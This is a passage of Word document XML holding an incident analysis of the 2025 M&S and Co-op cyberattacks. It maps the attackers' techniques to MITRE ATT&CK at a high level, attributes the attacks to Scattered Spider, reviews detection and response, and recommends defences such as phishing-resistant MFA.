        <w:t>22-27 April 2025: Attackers made repeated attempts using similar social engineering techniques, including impersonating colleagues and successfully answering security questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DF3B86" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:lastRenderedPageBreak/>
        <w:t>30 April 2025: Co-op publicly acknowledged the incident and shut down certain back-office and call-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>centre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> systems as a precautionary measure [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB859B" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>2 May 2025: The company confirmed that personal data belonging to a large number of current and former members had been compromised [10].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4163CD" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve">May-September 2025: Ongoing supply chain disruption resulted in empty shelves across stores. The total financial impact reached an estimated £206 million in lost sales, with the breach </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>ulti-mately</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> affecting approximately 6.5 million members [11, 12].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E76CF" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4093AE" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve">Assumption justified: The February NTDS.dit theft followed by April ransomware aligns closely with the sequence described in the IISF guide and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> analysis. Grouping M&amp;S and Co-op together is justified due to their shared retail-sector targeting and supporting NCSC sector-wide alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E41B2" w14:textId="6E66D893" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45EA45B4" wp14:editId="445FC11B">
            <wp:extent cx="3571875" cy="7773552"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183432783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573934" cy="7778033"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDB0815" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1: Timeline of the M&amp;S and Co-op cyber incidents (2025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A0AE8" w14:textId="5F0F4BDF" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Adversary TTP Mapping (MITRE ATT&amp;CK Enterprise)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31491D" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve">M&amp;S TTP Mapping (detailed technical analysis from IISF guide, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>, and M&amp;S statements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CEA76B" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>The IISF technical guide on Scattered Spider and the M&amp;S incident confirms that the group stole the Active Directory database file (NTDS.dit) as early as February 2025 and later deployed DragonForce ransomware on VMware ESXi hosts. Similar social engineering methods were used against Co-op just days later, supporting the idea of a related campaign.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F96B17" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve">T1566.004 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> Voice (Vishing) - Attackers made phone calls impersonating M&amp;S employees or IT staff to trick a third-party helpdesk contractor into performing password resets. This was the main initial access method [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368E4C8A" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1199 Trusted Relationship - The attackers exploited the trust relationship between M&amp;S and its outsourced helpdesk/IT provider [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B154A" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1003.003 OS Credential Dumping (NTDS.dit) - Attackers extracted the NTDS.dit file (Ac-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>tive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> Directory database) from a domain controller and cracked password hashes offline, obtaining a large number of valid credentials [1, 2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060C727B" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1078 Valid Accounts - Compromised legitimate accounts were used for authentication, lateral movement, and blending with normal user activity over an extended period [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26908DCF" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1556.006 Modify Authentication Process - The attackers requested password resets and tried to weaken or bypass multi-factor authentication. The IISF guide notes that after initial compromise, attackers register their own MFA tokens and use techniques like MFA fatigue. NCSC guidance on retailer incidents also highlights help-desk impersonation and weak MFA processes. [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D0FB9" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1219 Remote Access Software - Once inside, the attackers used remote desktop tools or similar services to jump from one system to another across the network. This helped them reach more valuable servers without installing obvious malware. This technique is standard in Scattered Spider campaigns and matches the lateral movement seen in the retailer attacks. [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70F7A9" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1562 Impair Defenses - To increase pressure and slow recovery, the attackers stopped key services and may have disabled or bypassed some security tools. This made it harder for the companies to restore systems quickly. The widespread outages and need to pause online services match this impact phase. The IISF guide notes Scattered Spider’s use of legitimate tools and defense evasion techniques. [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED9E4DD" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1567.002 Exfiltration Over Web Service - Before triggering ransomware, threat actors ex-filtrated significant volumes of customer personal data, including names, contact details, dates of birth, and online order histories. Both M&amp;S and Co-op later confirmed in official statements that customer data had been accessed and exfiltrated [1, 12].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482DBD4A" w14:textId="77777777" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:lastRenderedPageBreak/>
        <w:t>T1486 Data Encrypted for Impact - On 24 April, DragonForce ransomware was deployed against VMware ESXi hosts, encrypting virtual machines and causing significant operational dis-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00115C04">
        <w:t>ruption</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC392E8" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>T1070 Indicator Removal on Host - Logs were cleared and indicators of compromise removed to conceal malicious activity [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E78BA5" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="5DCEF4A6" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E53014" w14:textId="774D1095" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Root Cause &amp; Security Control Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7241E9" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The primary root cause of the incidents was social engineering. Attackers contacted help desks or third-party IT providers, impersonated legitimate employees, and successfully obtained password resets [1, 13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30576EE6" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Attackers were able to gain access to the Active Directory database file (NTDS.dit) with the attack on M&amp;S that happened in early February 2025. This allowed for offline cracking of password hashes and lateral movement within the network due to weak network segmentation, ultimately leading to the deployment of ransomware on VMware ESXi hosts. [1, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6027EB19" w14:textId="3DEEC18F" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Technical failures included insufficient monitoring of file access and identity-related changes. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Organisa-tional</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> weaknesses involved excessive trust in third-party providers without strict verification procedures,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>particularly during the Easter holiday period. Human factors were the most significant vulnerability, as staff were persuaded by convincing impersonation techniques using publicly available information [13,14].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76730063" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Co-op experienced similar social engineering attacks that resulted in the compromise of member data. The National Cyber Security Centre (NCSC) described these incidents as a “wake-up call” for the retail sector [15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E2BBCB" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The key control failure was the absence of phishing-resistant verification mechanisms for password resets and multi-factor authentication (MFA). Without stronger verification controls, attackers were able to bypass technical defences by exploiting human vulnerabilities [1, 16].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B2EE3" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="1D8FCA27" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5452B9FE" w14:textId="782E90F2" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Actor </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6251C" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The attacks are attributed to the Scattered Spider collective, a group known for its strong social </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>engi-neering</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> capabilities and use of impersonation techniques, particularly targeting IT support channels [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABA62DC" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The primary motivation behind the attacks looked like financial gain. The attackers conducted data exfiltration and deployed DragonForce ransomware as part of a double extortion strategy. However, there is no evidence of state involvement; this was cybercrime for profit. The IISF technical guide notes the techniques noted in the incident such as NTDS.dit extraction and ransomware deployment on VMware ESXi infrastructure, are in line with established tactics, techniques, and procedures (TTPs) related to Scattered Spider. [1, 2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F7AE6" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In July 2025, the NCA (National Crime Agency) arrested four people aged 17-20 for allegedly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partici-pating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in attacks on M&amp;S, Co-op, and Harrods. Each of those arrested is charged with offenses under the Computer Misuse Act, blackmail, and membership of an organized crime group. [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA8F63" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>While other ransomware groups operate in similar domains, the combination of timing, techniques, and tooling strongly indicates attribution to the Scattered Spider group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEBADE4" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="42A8B633" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7AF75F" w14:textId="218E5055" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Detection &amp; Response Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770AE95" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Detection of the attacks was delayed, with attackers remaining undetected for several weeks or months before causing visible disruption during the Easter period. Indicators of compromise, such as NTDS.dit extraction and unusual password reset activity, were not identified promptly [1, 2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E67761" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Once operational issues became apparent, including payment failures and system outages, both organ-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> responded effectively. M&amp;S reported the incident to the relevant authorities, engaged external cybersecurity experts, and paused online orders on 25 April 2025 to limit further risk [4]. Similarly, Co-op restricted access to certain back-office systems while maintaining retail operations [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E7145" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Both organisations confirmed that customer data had been accessed; however, payment details and pass-words were not compromised [6, 10]. Strengths of the response included timely reporting, coordination with external agencies, and transparent communication with customers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CC4445" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, there were problems with finding the first breach too late and the challenges associated with recovering encrypted virtual infrastructure. These incidents show the importance of enhanced monitoring of identity systems and early detection mechanisms. The events have been described as a significant warning for the retail sector, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>emphasising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the need for improved cybersecurity resilience [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6413F6" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Overall, while the response was responsible and aligned with incident management best practices, im-proved real-time monitoring and identity-focused detection capabilities could have reduced the overall impact of the attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E98D0" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="4C0722B2" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A85630" w14:textId="21BFA89D" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00053404" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>6 Strategic Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF4EBE" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Based on the identified failures, the following practical recommendations are proposed to improve organisational resilience against similar attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BB2B6" w14:textId="76F29A45" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Implement phishing-resistant MFA: Deploy hardware security keys or passkeys for all privileged accounts and help-desk access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741DC5DB" w14:textId="665BB5C8" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Justification: This directly blocks the main social engineering entry point used by the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attackers through phone calls and impersonation. The 2025 study by Tran-Truong et al. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>analysed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>many real-world cases of multi-factor authentication in digital systems [17]. It clearly showed that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hardware-based MFA and passkeys stop almost all vishing and help-desk impersonation attacks.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>In contrast, traditional app-based MFA can still be tricked by determined attackers. This is highly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>relevant to the M&amp;S and Co-op incidents because the attackers succeeded exactly by bypassing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>weak authentication methods through clever social engineering. Without strong phishing-resistant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>MFA, even large organisations remain vulnerable to this common tactic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C6562" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Effort: Medium Cost: Low-Medium.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B48E5" w14:textId="55FC54C3" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Strengthen help-desk verification processes: Introduce additional identity verification measures, such as secure verification codes or pre-established authentication phrases for password reset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>requests involving third parties [1].</w:t>
      </w:r>
